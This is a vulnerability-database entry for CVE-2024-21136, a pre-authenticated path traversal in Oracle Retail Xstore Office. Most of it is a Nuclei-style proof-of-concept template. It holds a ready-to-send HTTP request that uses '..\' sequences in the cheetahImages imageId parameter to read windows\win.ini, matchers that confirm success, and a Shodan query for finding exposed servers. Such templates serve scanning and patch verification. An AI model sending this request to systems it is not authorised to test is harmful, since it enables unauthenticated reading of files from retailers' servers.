CVE-2024-21136: Oracle Retail Xstore Suite - Pre-authenticated Path Traversal

2025-08-01 Oracle Retail Xstore Suite PoC Public

Description

Vulnerability in the Oracle Retail Xstore Office product of Oracle Retail Applications (component: Security). Supported versions that are affected are 19.0.5, 20.0.3, 20.0.4, 22.0.0 and 23.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Retail Xstore Office. While the vulnerability is in Oracle Retail Xstore Office, attacks may significantly impact additional products (scope change).

PoC

id: CVE-2024-21136

info:
  name: Oracle Retail Xstore Suite - Pre-authenticated Path Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    Vulnerability in the Oracle Retail Xstore Office product of Oracle Retail Applications (component: Security). Supported versions that are affected are 19.0.5, 20.0.3, 20.0.4, 22.0.0 and 23.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Retail Xstore Office. While the vulnerability is in Oracle Retail Xstore Office, attacks may significantly impact additional products (scope change).
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Retail Xstore Office accessible data.
  reference:
    - https://www.oracle.com/security-alerts/cpuapr2024.html
    - https://www.synacktiv.com/en/advisories/oracle-retail-xstore-suite-pre-authenticated-path-traversal
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21136
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-21136
    epss-score: 0.01783
    epss-percentile: 0.77155
    cpe: cpe:2.3:a:oracle:retail_xstore_office:19.0.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: retail_xstore_office
    shodan-query: html:"xstoremgwt"
  tags: cve,cve2024,oracle,xstore,lfi,vkev,vuln

http:
  - raw:
      - |
        GET /xstoremgwt/cheetahImages?imageId=..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'for 16-bit app support'
          - '[fonts]'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e7bf3a5e39698805f185b9cd1e9635bcf69f9bce755930883779cff6e3d02fa502210081372e001eb5e043f7ad37ee6389640f0bb5cc3b44cfa6df8bf62fb0ef1d2cac:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities